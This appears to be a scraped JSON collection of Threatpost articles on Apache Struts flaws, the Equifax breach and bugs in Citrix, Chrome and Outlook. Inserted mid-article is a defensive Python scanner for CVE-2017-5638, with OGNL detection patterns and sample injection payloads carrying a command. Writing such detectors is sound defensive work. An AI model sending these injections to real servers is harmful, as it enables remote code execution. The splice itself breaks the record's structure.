There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all 
versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to serve normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates that the vulnerability could affect the 65 percent of Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have 
developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Struts 2 applications were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the process of taking structured data from one format and rebuilding it into an object. When the input is attacker-controlled, that process can be subverted, and it has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. 
This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. 
website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday the company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in an open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. 
The analyst who penned the report, however, failed to specify which vulnerability was involved or to explain how he arrived at that conclusion.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations that took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser that Struts 2 uses to handle file uploads, allowed an unauthenticated attacker to execute arbitrary code on the server by sending a maliciously crafted request to a Struts-based web application. The flaw, which first surfaced on Chinese forums before it was documented by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), but proof-of-concept exploit code quickly found its way into Metasploit. 
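As an added, constructed example (it is not from the article, from Cisco Talos, or from the Metasploit module), the Python below shows how a defender might flag CVE-2017-5638-style requests in web-server logs: a legitimate Content-Type is `type/subtype` plus optional parameters, whereas the public payloads pushed an OGNL expression such as `%{...}` through that header. The log format, client addresses and indicator strings are all assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# A well-formed Content-Type is "type/subtype" optionally followed by
# ";parameters" (RFC 7231 grammar, simplified).  The 2017 Struts payloads
# replaced the whole value with an OGNL expression, so they never fit it.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_VALID_CT = re.compile(rf"^\s*{_TOKEN}/{_TOKEN}\s*(;.*)?$", re.DOTALL)

# Substrings seen in public CVE-2017-5638 proof-of-concept payloads.  This is
# an illustrative, deliberately non-exhaustive list (assumption: tune it to
# your own traffic before relying on it).
_OGNL_MARKERS = (
    "%{", "${", "#_memberaccess", "ognlcontext", "default_member_access",
    "@java.lang.runtime", "processbuilder", "#cmd", "#context",
)


def is_suspicious_content_type(value: str) -> bool:
    """Return True if a Content-Type header value looks like an OGNL injection."""
    decoded = unquote(value)  # payloads are often percent-encoded to evade filters
    lowered = decoded.lower()
    if any(marker in lowered for marker in _OGNL_MARKERS):
        return True
    # Anything that is not type/subtype[;params] is a parser-confusion candidate.
    return _VALID_CT.match(decoded) is None


# Constructed log format (assumption, not a real server's):
#   <client-ip> <method> <path> ct="<Content-Type header value>"
_LOG_RE = re.compile(r'^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) ct="(?P<ct>.*)"$')


def scan_log(lines):
    """Return (ip, path, content_type) for every request flagged as suspicious."""
    hits = []
    for line in lines:
        match = _LOG_RE.match(line)
        if match is None:
            continue  # not a request line we understand; skip it
        if is_suspicious_content_type(match["ct"]):
            hits.append((match["ip"], match["path"], match["ct"]))
    return hits


# Constructed sample traffic (not captured data).  Lines 3 and 4 mimic the
# shape of the public payload: an OGNL expression where a MIME type belongs,
# once in the clear and once percent-encoded.
SAMPLE_LOG = [
    '10.0.0.5 POST /upload.action ct="multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"',
    '10.0.0.6 GET /index.action ct="application/x-www-form-urlencoded"',
    '203.0.113.9 POST /upload.action ct="%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd=\'id\')}"',
    '203.0.113.10 POST /upload.action ct="%25%7B(%23_%3D%27multipart/form-data%27)%7D"',
]

if __name__ == "__main__":
    for ip, path, ct in scan_log(SAMPLE_LOG):
        print(f"ALERT {ip} {path} Content-Type={ct!r}")
```

The grammar check matters as much as the marker list: an attacker can rename `#cmd` or avoid the literal `%{`, but the header still has to be something the Jakarta parser will try to interpret, and that something will not look like a MIME type. Decoding before matching closes the obvious percent-encoding evasion.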
Public scans and attacks spiked immediately following disclosure of the vulnerability, and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and, as with the [insecure IoT devices that have lately prompted calls for legislation](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested that the only way to prevent breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote. \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. 
Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>). \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sens. Orrin Hatch (R-UT) and Ron Wyden (D-OR), sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations, the Commission did confirm Thursday afternoon that, because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach, but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week that Argentinians may be affected as well. 
Brian Krebs, who authors the site, said he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinians, discovered an Equifax portal for employees in Argentina that exposed their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security number.\n\nThe site, according to Holden, \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u2018admin/admin.\u2019\u201d Krebs said the portal was disabled after he notified Equifax\u2019s attorney, and that the company is looking into how it was left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any, was exploited.\n\n[The letter](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>), which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache 
Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. 
There is no silver bullet for preventing exploits from surfacing in the wild, however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero-day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said. \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses that use Apache Struts: know which frameworks and libraries are used in your setup, establish processes to roll out security fixes, and, perhaps most importantly, understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. 
Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from the Jakarta Multipart parser Struts uses for file uploads and allowed an unauthenticated attacker to execute arbitrary code on a server running a vulnerable Struts 2 application. Researchers with Cisco Talos, [who reported the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit that it\u2019s more likely the attackers used CVE-2017-5638, an expression language (OGNL) injection vulnerability triggered through a crafted Content-Type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including that keeping libraries secure can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. 
I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage-control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The change was presumably a reaction to a series of tweets that went viral on Friday night calling out Equifax for issuing predictable PINs derived from the date and time they were requested, a format the company allegedly had followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward, consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. 
[pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call-center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be automatically charged when the free year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeatedly by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration-clause policy.\n\nAs expected, multiple lawsuits have been filed against the company in the wake of the breach. One class-action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. 
to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:13:24", "description": "A Citrix Workspace vulnerability that was fixed in July has been found to have a secondary attack vector, which would allow cybercriminals to elevate privileges and remotely execute arbitrary commands under the SYSTEM account.\n\nThe bug (CVE-2020-8207) exists in the automatic update service of the Citrix Workspace app for Windows. It could allow local privilege escalation as well as remote compromise of a computer running the app when Windows file sharing (SMB) is enabled, according to the [Citrix advisory](<https://support.citrix.com/article/CTX277662>).\n\nThe bug, though mostly fixed over the summer, was recently found to still allow attackers to abuse Citrix-signed MSI installers, according to Pen Test Partners (MSI is the filename extension of Windows Installer packages). This turns the bug into a remote command-line injection vulnerability.\n\nThe update service [originally relied](<https://www.pentestpartners.com/security-blog/raining-system-shells-with-citrix-workspace-app/>) on a weak file hash within a JSON payload to decide whether an update should proceed \u2013 allowing attackers to get their own code downloaded and run as SYSTEM by exploiting the weak hash check. 
To fix the problem, the latest update catalogs are now directly downloaded from the Citrix update servers, and the service \u201ccross-references the hashes with the file that is requested for install from the UpdateFilePath attribute,\u201d wrote researchers at Pen Test Partners, in a [Monday posting](<https://www.pentestpartners.com/security-blog/the-return-of-raining-system-shells-with-citrix-workspace-app/>).\n\n\u201cIf the update file is signed, valid and the hash of the update file matches one of the files within the manifest, the update file is executed to perform the upgrade,\u201d they explained.\n\nHowever, the patch didn\u2019t prevent remote connectivity to limit the attack surface.\n\n\u201cThe catalog includes executables and MSI files for installation,\u201d according to the firm. \u201cMSI files on the other hand cannot be executed in the same way as executable files, therefore the update service must handle these differently.\u201d\n\nIn looking at the installer-launch code, the researchers found that the application checks the extension of the file requested for update, and if it ends with MSI, it is assumed to be a Windows Installer file. Since the MSI file is checked for a valid signature and is cross-referenced with the current catalog, attackers can\u2019t directly install arbitrary MSI files.\n\nEven though the MSI files are signed and hashed to prevent modification, one of the features supported by the Windows Installer is MSI Transforms (MST).\n\n\u201cAs the name suggests, MSI Transforms support altering or transforming the MSI database in some way prior to installation,\u201d according to Pen Test Partners. \u201cDomain administrators commonly use this feature to push out MSI files within Active Directory environments that do not always work in an unattended way when executed on their own. 
For example, an MST might be created that will inject a product activation code prior to installing.\u201d\n\nTo apply an MST, users would specify the path to the transform file on the command line, which merges the main MSI file with changes that are present within the MST file during the installation process.\n\nTherein lies the bug: \u201cSince we can control the arguments passed to msiexec, we can include the path to a malicious Transform but using an official, signed Citrix MSI that is present within the catalog file,\u201d researchers said.\n\nMalicious Transforms can be generated with an existing tool called [Microsoft Orca](<https://docs.microsoft.com/en-us/windows/win32/msi/orca-exe>), they added, or with a custom tool. Then, to exploit the vulnerability, attackers would place the original MSI installer and the MST onto a network share ready for the victim machine.\n\n\u201cBoth the local and remote privilege-escalation methods can only be exploited while an instance of CitrixReceiverUpdate.exe is running on the victim host as before,\u201d the researchers concluded. 
\u201cI think the remote vector is easier to exploit this time around since you can place both MSI and MST files on a network share under the attacker\u2019s control.\u201d\n\nCitrix Workspace for Windows users should update their apps to [the latest version](<https://www.citrix.com/downloads/workspace-app/windows/>), containing a revised patch.\n", "cvss3": {}, "published": "2020-09-22T17:20:21", "type": "threatpost", "title": "Known Citrix Workspace Bug Open to New Attack Vector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-8207"], "modified": "2020-09-22T17:20:21", "id": "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "href": "https://threatpost.com/citrix-workspace-new-attack/159459/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:30", "description": "A vulnerability in Google\u2019s Chromium-based browsers would allow attackers to bypass the Content Security Policy (CSP) on websites, in order to steal data and execute rogue code.\n\nThe bug ([CVE-2020-6519](<https://bugs.chromium.org/p/chromium/issues/detail?id=1064676>)) is found in Chrome, Opera and Edge, on Windows, Mac and Android \u2013 potentially affecting billions of web users, according to PerimeterX cybersecurity researcher Gal Weizman. Chrome versions 73 (March 2019) through 83 are affected (84 was released in July and fixes the issue).\n\nCSP is a web standard that\u2019s meant to thwart certain types of attacks, including cross-site scripting (XSS) and data-injection attacks. CSP allows web admins to specify the domains that a browser should consider to be valid sources of executable scripts. 
A CSP-compatible browser will then only execute scripts loaded in source files received from those domains.\n\n\u201cCSP is the primary method used by website owners to enforce data-security policies to prevent malicious shadow-code executions on their website, so when browser enforcement can be bypassed, personal user data is at risk,\u201d Weizman explained, [in research](<https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/>) released on Monday.\n\nMost websites use CSP, the researcher noted, including internet giants like ESPN, Facebook, Gmail, Instagram, TikTok, WhatsApp, Wells Fargo and Zoom. Some notable names were not affected, including GitHub, Google Play Store, LinkedIn, PayPal, Twitter, Yahoo\u2019s Login Page and Yandex.\n\nTo exploit the vulnerability, an attacker first needs to gain access to the web server (through brute-forcing passwords or another method) in order to modify the JavaScript code it serves. Then, the attacker could abuse the browser\u2019s handling of frame-src or child-src to load and execute the injected code, bypassing CSP enforcement and thus the site\u2019s policy, Weizman explained.\n\nBecause of the post-authentication aspect of the bug, it ranks as a medium-severity issue (6.5 out of 10 on the CVSS scale). \u201cHowever, because it affects CSP enforcement, this has vast implications,\u201d Weizman said, comparing it to having an issue with seatbelts, airbags and collision sensors.\n\n\u201c[Because of the] increased perception of safety, the damage caused in an accident when this equipment is faulty is much more severe,\u201d the researcher said. \u201cIn a similar way, website developers may allow third-party scripts to add functionality to their payment page, for example, knowing that CSP will restrict access to sensitive information. 
So, when CSP is broken, the risk for sites that relied on it is potentially higher than it would have been if the site never had CSP to begin with.\u201d\n\nThe vulnerability was present in Chrome browsers for more than a year before being fixed, so Weizman warned that the full implications of the bug are not yet known: \u201cIt is highly likely that we will learn of data breaches in the coming months that exploited it and resulted in the exfiltration of personally identifiable information (PII) for nefarious purposes.\u201d\n\nUsers should update their browsers to the latest versions to avoid falling victim to an exploit.\n", "cvss3": {}, "published": "2020-08-10T19:43:46", "type": "threatpost", "title": "Google Chrome Browser Bug Exposes Billions of Users to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-6519"], "modified": "2020-08-10T19:43:46", "id": "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "href": "https://threatpost.com/google-chrome-bug-data-theft/158217/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T22:28:38", "description": "Users of the Microsoft Outlook for Android app should update their apps to avoid a range of attacks.\n\nThe bug (CVE-2019-1460) would allow an attacker to perform cross-site scripting (XSS) attacks on the affected systems and run scripts in the security context of the current user, according to Microsoft\u2019s [advisory on the bug](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1460#ID0EA>). XSS occurs when malicious parties [inject client-side scripts](<https://www.owasp.org/index.php/Cross-site_Scripting_\\(XSS\\)>) into web pages, which trick the unsuspecting user\u2019s browser into thinking that the script came from a trusted source.\n\nIn this case, the computing giant said that the issue exists in the way Microsoft Outlook for Android software parses specifically crafted email messages \u2013 thus, an attacker could exploit the vulnerability by sending just such an email. 
Czech firm Cybersecurity Help said in a [posting this week](<https://www.tenforums.com/windows-10-news/144873-cve-2019-1460-outlook-android-spoofing-vulnerability.html#post1774661>) that the problem is classified as \u201cImproper Neutralization of Input During Web Page Generation\u201d and exists due to insufficient sanitization of user-supplied data.\n\nThe adversary would need to be authenticated to the same network as the potential victim in order to carry out an attack, Microsoft said.\n\nA [write-up by Symantec](<https://www.symantec.com/security-center/vulnerabilities/writeup/110911?om_rssid=sr-advisories>) said that an attacker can exploit this issue to conduct spoofing attacks, while Cybersecurity Help added that an attacker could \u201csteal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.\u201d\n\nUsers should ensure that they have the [latest version of the app](<https://play.google.com/store/apps/details?id=com.microsoft.office.outlook>), and update it manually if they haven\u2019t received an auto-update.\n\nBeyond installing that update, Symantec also noted that mitigation includes running the software as a nonprivileged user with minimal access rights.\n\nResearcher Rafael Pablos was credited with finding the bug, which Microsoft rates as \u201cimportant\u201d in severity. It\u2019s listed as having a 5.6 out of 10 severity rating on the CVSS v3 scale.\n", "cvss3": {}, "published": "2019-11-21T19:15:17", "type": "threatpost", "title": "Microsoft Outlook for Android Bug Opens Door to XSS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1460", "CVE-2020-5135"], "modified": 